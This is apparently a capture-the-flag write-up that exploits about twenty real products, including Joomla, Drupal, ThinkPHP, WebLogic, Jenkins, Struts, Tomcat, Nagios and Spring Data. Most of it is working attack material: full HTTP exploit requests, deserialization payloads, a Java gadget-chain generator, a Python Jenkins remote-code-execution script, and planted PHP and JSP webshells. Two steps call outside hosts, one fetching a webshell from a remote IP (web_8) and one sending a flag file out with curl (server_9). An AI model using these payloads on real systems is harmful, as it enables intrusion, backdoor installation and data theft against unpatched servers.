# icq_rhg_20 wp


### example_n

**The vulnerability description:**
**Exploit procedures:**
**Final exploit script:**
refer to the script: example_n.py

### web_1

**The vulnerability description:**
CVE-2015-8562
Joomla session deserialization would lead to arbitrary command execution.


**Exploit procedures:**
1. construct the deserialization payload in the User-agent which would be trigged  in `libraries/vendor/joomla/session/Joomla/Session/Session.php`, the following payload, for instance, is intended to execute shell command `ls`:

 ```json
    {'User-Agent': '123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:40:"system(\'ls\');JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}\xf0\x9d\x8c\x86'}
 ```
    
2. send the payload to any dynamic page of the vulnerable Joomla website, and it would be stored in database;

3. visit the website again, with the same malicious session, and you will see the shell command has been executed, and the output is directly retrieved back.

**Final exploit script:**
refer to the script: web_1.py



### web_2

**The vulnerability description:**
The Uc_key is leaked from the  /config/config_ucenter_default.php, and some security mechanisms have been disabled for the ease of exploiting. You can forge a communication with the UC_Server with the UC_key to get shell.


**Exploit procedures:**
1. download the uc_key from the /config/config_ucenter_default.php, you need to parse this php file to extract the uc_key;

2. forge a communication to /api/uc.php with the internal function `updatebadwords` while you inject your malicious payload inside it, here is an example:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="0">
 <item id="findpattern">/admin/e</item>
  <item id="replacement">eval(base64_decode($_REQUEST[c]));</item>
  </item>
 </root>
```

3. visit the following URL to trigger the malicious payload `/forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin`

**Final exploit script:**
refer to the script: web_2.py

### web_3

**The vulnerability description:**
Thinkphp 5.x RCE 

**Exploit procedures:**
1. very easy and cosy payload, just visit the following payload to execute the shell command `ls`:
`index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls`

**Final exploit script:**
refer to the script: web_3.py


### web_4

**The vulnerability description:**
CVE-2019-6340
Joomla Restful Web-service deserialization

**Exploit procedures:**
1. send the following serialized data to exploit the vulnerability (execute shell command ls for example)

```
POST /index.php/node?_format=hal_json HTTP/1.1
Host: rhg4:8004
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/hal+json
Upgrade-Insecure-Requests: 1
Content-Length: 638

{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:13:\"cat /tmp/flag\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://127.0.0.1/rest/type/shortcut/default"
    }
  }
}
```

**Final exploit script:**
refer to the script: web_4.py


### web_5

**The vulnerability description:**
 SA-CORE-2014-005
 leverage the sql injection to getshell
**Exploit procedures:**
1. First of all, insert a backdoor route to the database by the sql injection, the payload is shown as following:

```
POST / HTTP/1.1
Host: rhg4:8005
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Python-urllib/2.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 306

name[0]=test2&name[0;insert into menu_router (path,  page_callback, access_callback, include_file, load_functions, to_arg_functions, description) values ('<?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', 'modules/php/php.module', '', '', '');#]=test&form_id=user_login_block&pass=test
```
    
2. Utilize the backdoor route to execute any shell command at your will:

```
POST /?q=%3C%3Fphp+eval%28base64_decode%28ZXZhbCgkX1BPU1RbZV0pOw%29%29%3B%3F%3E HTTP/1.1
Host: rhg4:8005
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Python-urllib/2.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

e=system%28%27echo+haozigegeL%3Bcat+%2Ftmp%2Fflag%3Becho+haozigegeR%27%29%3B
```


**Final exploit script:**
refer to the script: web_5.py


### web_6

**The vulnerability description:**
CVE-2018-7600
Drupal render API exploit
**Exploit procedures:**
1. Send the following payload to target website to get flag, and you will find the flag in the returning outcome:

```
POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1
Host: rhg4:8006
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Content-Length: 148

mail[#post_render][]=system&mail[#type]=markup&form_id=user_register_form&_drupal_ajax=1&mail[#markup]=echo haozigegeL;cat /tmp/flag;echo haozigegeR
```

**Final exploit script:**
refer to the script: web_6.py


### web_7

**The vulnerability description:**
CVE-2018-20129
Arbitrary file upload at select_images_post.php

**Exploit procedures:**
1. arbitrary file upload without any previous authentication required at `/include/dialog/select_images_post.php`, using the filename such as `1.jpg.p*hp` to bypass the filter of the file extension, intact payload show as following(the file content should start with a normal image's format):

```
POST /include/dialog/select_images_post.php HTTP/1.1
Host: rhg4:8007
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Origin: http://172.25.101.60:8007
Referer: http://172.25.101.60:8007/member/article_add.php
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,pl;q=0.6,lb;q=0.5
Upgrade-Insecure-Requests: 1
Content-Length: 237
Content-Type: multipart/form-data; boundary=d30925cc2bbc44879f1d6d1d0711f624

--d30925cc2bbc44879f1d6d1d0711f624
Content-Disposition: form-data; name="upload"; filename="1.jpg.p*hp"
Content-Type: image/png

PNG
<?php system($_REQUEST[222]);?>
--d30925cc2bbc44879f1d6d1d0711f624--
```

2. execute any shell command with the shell you just upload before

**Final exploit script:**
refer to the script: web_7.py

### web_8

**The vulnerability description:**
CVE-2015-4553 
From variable manipulation to remote file inclusion

**Exploit procedures:**
1. leverage the variable manipulation to delete config file /data/admin/config_update.php, payload is shown as following:

```
GET /install/index.php?install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php&step=11&insLockfile=a&s_lang=a HTTP/1.1
Host: rhg4:8008
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Accept-Language: zh-cn,zh;q=0.5
```

2. utilize the empty config_update.php file and variable manipulation to override the updateHost to your malicious server, and it will return the webshell as soon as the victim visits it. The payload is shown as following:


```
GET /install/index.php?install_demo_name=webshell.php&step=11&updateHost=http%3A%2F%2F47.75.202.81%2F&s_lang=a&insLockfile=a HTTP/1.1
Host: rhg4:8008
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Accept-Language: zh-cn,zh;q=0.5
```
The payload returned by the malicious server:

```
<?php system($_REQUEST[222]);?>
```

3. the webshell will be at /install/webshell.php
    

**Final exploit script:**
refer to the script: web_8.py


### web_9

**The vulnerability description:**
Login with the weak username/password, then get shell at the backend. (username && password will be provided at `username.txt` && `password.txt`)
**Exploit procedures:**
1. brute force the login credentials (it would be admin/admin123 for this website application)

2. add a webshell file directly at file manager system (very easy operation)
**Final exploit script:**
refer to the script: web_9.py


### web_10

**The vulnerability description:**
The plus/download.php page is vulnerable to sql injection, we could update the admin's login credentials, then get shell at the backend. (The security check has been disabled)

**Exploit procedures:**
1. exploit the /plus/download.php by updating the username/password of administrator to xuan/admin, the payload is shown as following:

```
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=120&arrs2[]=117&arrs2[]=97&arrs2[]=110&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
```

2. add a webshell file directly at file manager system (very easy operation)

**Final exploit script:**
refer to the script: web_10.py



### server_1

**The vulnerability description:**
CVE-2015-1427
ElasticSearch Groovy sandbox escape

**Exploit procedures:**
1. a record is required for the ElasticSearch exploit at least, using the following payload to add a record:

```
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}
```


2. send the following payload to execute arbitrary shell command:

```
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
```


**Final exploit script:**
refer to the script: server_1.py


### server_2

**The vulnerability description:**
CVE-2017-10271
wls-wsat XMLDecoder deserialization

**Exploit procedures:**
1. Send the following payload to execute linux command:

```
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>python -m SimpleHTTPServer</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
**Final exploit script:**
refer to the script: server_2.py


### server_3

**The vulnerability description:**
Jenkins Unauthorized access to RCE

**Exploit procedures:**
1. get the crumb firstly by visiting the index page which would be used in the form's submission.

2. Using the `/script` page to execute arbitrary command

```
println "cat /tmp/flag".execute().text
```
**Final exploit script:**
refer to the script: server_3.py



### server_4

**The vulnerability description:**
ZooKeeper unauthorized access to sensitive node data (the flag is saved at the /tmp/flag node)

**Exploit procedures:**
1. Running the following command to obtain the flag( The script could be found in the zookeeper's installation package)

```shell
/opt/bitnami/zookeeper/bin/zkCli.sh -server xx.xx.xx.xx:2181 get /tmp/flag
```
**Final exploit script:**
refer to the script: server_4.py


### server_5

**The vulnerability description:**
S2-048
Struts ONGL expression injection

**Exploit procedures:**
1. since the struts-showcase has been installed, we can exploit the `saveGangster.action` by the following payload to execute shell command:

```
POST /integration/saveGangster.action HTTP/1.1
Host: 127.0.0.1:9005
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 1168

age=1&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat+%2Ftmp%2Fflag%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&description=1
```
**Final exploit script:**
refer to the script: server_5.py


### server_6

**The vulnerability description:**
CVE-2017-1000353
Jenkins deserialization in bidirectional communication channel 
**Exploit procedures:**
1. first of all, we need to generate the deserialization payload, the payload.java is shown as following:

```java
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamException;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.Signature;
import java.security.SignedObject;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.concurrent.ConcurrentSkipListSet;
import java.util.concurrent.CopyOnWriteArraySet;
import net.sf.json.JSONArray;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.collection.AbstractCollectionDecorator;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.ReferenceMap;
import org.apache.commons.collections.set.ListOrderedSet;
 
public class Payload implements Serializable {
    private Serializable payload;
    public Payload(String cmd) throws Exception {
        this.payload = this.setup(cmd);
    }
    public Serializable setup(String cmd) throws Exception {
        final String[] execArgs = new String[] { cmd };
 
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        execArgs), new ConstantTransformer(1) };
        Transformer transformerChain = new ChainedTransformer(transformers);
        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            f = HashSet.class.getDeclaredField("backingMap");
        }
        f.setAccessible(true);
        HashMap innimpl = (HashMap) f.get(map);
        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }
        f2.setAccessible(true);
        Object[] array2 = (Object[]) f2.get(innimpl);
        Object node = array2[0];
        if (node == null) {
            node = array2[1];
        }
        Field keyField = null;
        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (Exception e) {
            keyField = Class.forName("java.util.MapEntry").getDeclaredField(
                    "key");
        }
        keyField.setAccessible(true);
        keyField.set(node, entry);
 
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
        keyPairGenerator.initialize(1024);
        KeyPair keyPair = keyPairGenerator.genKeyPair();
        PrivateKey privateKey = keyPair.getPrivate();
        PublicKey publicKey = keyPair.getPublic();
        Signature signature = Signature.getInstance(privateKey.getAlgorithm());
        SignedObject payload = new SignedObject(map, privateKey, signature);
        JSONArray array = new JSONArray();
        array.add("asdf");
        ListOrderedSet set = new ListOrderedSet();
        Field f1 = AbstractCollectionDecorator.class
                .getDeclaredField("collection");
        f1.setAccessible(true);
        f1.set(set, array);
        DummyComperator comp = new DummyComperator();
        ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
        csls.add(payload);
        CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
        CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
        Container c = new Container(csls);
        a1.add(c);
        a1.add(set);
        a2.add(set);
        a2.add(csls);
        ReferenceMap flat3map = new ReferenceMap();
        flat3map.put(new Container(a1), "asdf");
        flat3map.put(new Container(a2), "asdf");
        return flat3map;
    }
    private Object writeReplace() throws ObjectStreamException {
        return this.payload;
    }
    static class Container implements Serializable {
        private Object o;
        public Container(Object o) {
            this.o = o;
        }
        private Object writeReplace() throws ObjectStreamException {
            return o;
        }
    }
    static class DummyComperator implements Comparator, Serializable {
        public int compare(Object arg0, Object arg1) {
            // TODO Auto-generated method stub
            return 0;
        }
        private Object writeReplace() throws ObjectStreamException {
            return null;
        }
    }
    public static void main(String args[]) throws Exception{
        if(args.length != 2){
            System.out.println("java -jar payload.jar outfile cmd");
            System.exit(0);
        }
        String cmd = args[1];
        FileOutputStream out = new FileOutputStream(args[0]);
 
        Payload pwn = new Payload(cmd);
        ObjectOutputStream oos = new ObjectOutputStream(out);
        oos.writeObject(pwn);
        oos.flush();
        out.flush();
    } 
}
```

2. compile the java to jar, the run with the following command:

```shell
java -jar jenkins.jar jenkins.bin
```

3. Using a special script to send the upload/download request one by one to trigger the deserialization

```python
import requests
import uuid
import threading
import logging


logging.basicConfig(level=logging.DEBUG, format="%(threadName)s - %(message)s")
log = logging.getLogger(__file__)

 
class CVE_2017_1000353(object):
    ## CVE ID

    # CVE-2017-1000353

    ## Unauthenticated remote code execution

    # An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java
    # [SignedObject] object to the remoting-based Jenkins CLI, that would be be deserialized using a new
    # [ObjectInputStream], bypassing the existing blacklist-based protection mechanism.

    ## Affected versions

    # - All Jenkins main line releases up to and including 2.56
    # - All Jenkins LTS releases up to and including 2.46.1

    ## Fix

    # - Jenkins main line users should update to 2.57
    # - Jenkins LTS users should update to 2.46.2

    def __init__(self, jenkins_cli_uri, java_serialization_file):
        self.jenkins_cli_uri = jenkins_cli_uri
        self.jenkins_sesuuid = str(uuid.uuid4())
        self.java_serialization_file = java_serialization_file

        self.upload_event = threading.Event()
        self.download_event = threading.Event()

    def exploit(self):
        threads = [
            threading.Thread(name='download', target=self.download),
            threading.Thread(name='upload', target=self.upload)
        ]

        for thread in threads: thread.start()
        for thread in threads: thread.join()

    def download(self):
        headers = {
            'Side' : 'download',
            'Session': self.jenkins_sesuuid
        }
        response = requests.post(self.jenkins_cli_uri, headers=headers, data=self.generate_download_payload())
        self.upload_event.set()
        self.download_event.wait()
        log.info(response.content)   # If missing, code will not be executed.

    def upload(self, data='asdf'):
        headers = {
            'Side' : 'upload',
            'Session': self.jenkins_sesuuid
        }

        # timeout: 0.5 < wait(1000); please read /jenkins-2.4.5-source/core/src/main/java/hudson/model/FullDuplexHttpChannel.java
        self.upload_event.wait(0.5)
        response = requests.post(self.jenkins_cli_uri, headers=headers, data=self.generate_upload_payload())
        self.download_event.set()
        log.info(response.content)

    def generate_download_payload(self):
        return b""

    def generate_upload_payload(self):
        payload = [
            b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=',
            b'\x00\x00\x00\x00',
            open(self.java_serialization_file, "rb").read()
        ]

        return b''.join(payload)

 
if __name__ == "__main__":
    import sys

    if len(sys.argv) != 3:
        log.info("[*] python {} <http://127.0.0.1:8080/cli> <java_serialization_data.bin>".format(sys.argv[0]))
        sys.exit(1)

    url = sys.argv[1]
    java_serialization_data_bin = sys.argv[2]

    jenkins = CVE_2017_1000353(url, java_serialization_data_bin)
    jenkins.exploit()

```
**Final exploit script:**
refer to the script: server_6.py



### server_7

**The vulnerability description:**
Mysql UDF to RCE (the password of the mysql server could be obtained from the web_7 config file or using a brute force method.

**Exploit procedures:**
1. get the login credentials to the mysql server by brute force or just try to parse the web configuration file;

2. using `select 0xaaaaaa in to dumpfile` to upload the UDF library to `/usr/lib/mysql/plugin/test.so`, and create `sys_eval` function by `CREATE FUNCTION sys_eval RETURNS string SONAME 'test.so';`;

3. execute `sys_eval` function to execute shell command.

**Final exploit script:**
refer to the script: server_7.py


### server_8

**The vulnerability description:**
Using put method to upload arbitrary file in Tomcat.

**Exploit procedures:**
1. put the webshell to the web server with the following payload:

```
PUT /222.jsp/ HTTP/1.1
Host: rhg4:9008
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Language: en
Content-Length: 253

<% java.io.InputStream input = Runtime.getRuntime().exec(new String[] {"sh","-c",request.getParameter("cmd")}).getInputStream();int len = -1;byte[] bytes = new byte[4092];while ((len = input.read(bytes)) != -1) {out.println(new String(bytes, "GBK"));}%>
```

2. visit the webshell to execute shell command

**Final exploit script:**
refer to the script: server_8.py



### server_9

**The vulnerability description:**
Nagios login with weak password and RCE by the vulnerable fetch_rss function

**Exploit procedures:**
1. Brute force to login into the ngios system (nagiosadmin/nagiosadmin), and trigger the fetch_rss function by the visiting `/nagios/rss-corefeed.php?url=https://xx.xx.xx.xx/aaa`

2. start a remote malicious server for interaction with the victim, which would return with the following payload if trigged:

   ```
   http://xx.xx.xx.xx/xxx" -Fflag=@/tmp/flag "
   ```

3. The flag would be collected at the remote malicious server
**Final exploit script:**
refer to the script: server_9.py


### server_10

**The vulnerability description:**
CVE-2018-1273
Spring-data SPEL injection leading to RCE

**Exploit procedures:**
1. send the following payload to execute linux shell command:

```
POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
```

**Final exploit script:**
refer to the script: server_10.py